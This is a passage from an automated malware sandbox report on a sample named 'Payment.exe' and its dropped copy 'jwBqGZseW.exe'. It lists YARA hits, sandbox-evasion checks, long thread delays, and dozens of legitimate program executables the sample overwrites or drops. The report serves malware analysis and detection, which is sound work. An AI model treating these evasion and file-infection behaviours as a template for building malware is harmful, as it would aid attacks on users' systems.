                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Payment.exe PID: 3532, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jwBqGZseW.exe PID: 7616, type: MEMORYSTR
                  Source: C:\Windows\System32\AppVClient.exeCode function: 14_2_005352A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 14_2_005352A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00C052A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 19_2_00C052A0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B952A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 21_2_00B952A0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_007252A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 27_2_007252A0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_007D52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 28_2_007D52A0
                  Source: C:\Windows\SysWOW64\perfhost.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleepgraph_23-6180
                  Source: C:\Windows\SysWOW64\perfhost.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,Sleepgraph_23-6167
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: 9670000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: 8FB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: A670000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: B670000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: 3A20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: 3CF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeMemory allocated: 3A30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: 12C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: 32D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: 16C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: 9470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: 8DD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: A470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: B470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: B870000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: 37C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: 39D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeMemory allocated: 37F0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599812Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599550Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599293Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599185Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 599076Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598968Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598858Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598750Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598640Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598421Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598311Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597971Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597849Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597609Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597500Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597390Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597280Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597171Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 597058Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596951Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596842Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596372Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596252Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596128Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595867Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595701Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595588Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595463Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595308Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594986Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594691Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594218Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 594109Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593997Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593886Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593765Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593655Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593538Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593419Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593297Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593178Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 593047Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 592923Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeThread delayed: delay time: 592797Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599843
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599734
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599625
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599516
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599404
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599296
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599188
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 599076
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598968
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598858
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598649
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598547
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598438
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598320
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598188
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 598078
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597963
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597860
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597750
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597640
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597532
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597422
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597313
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597178
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 597047
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596938
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596601
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596485
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596373
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596265
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 596122
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595986
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595875
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595766
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595656
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595542
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595438
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595328
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595219
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595110
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 595000
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594694
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594448
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594342
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594234
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594101
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 594000
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 593891
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 593773
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeThread delayed: delay time: 593672
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5125Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4665Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeWindow / User API: threadDelayed 4991Jump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeWindow / User API: threadDelayed 4034Jump to behavior
                  Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 483
                  Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 7281
                  Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 2716
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeWindow / User API: threadDelayed 4460
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeWindow / User API: threadDelayed 5221
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Payment.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
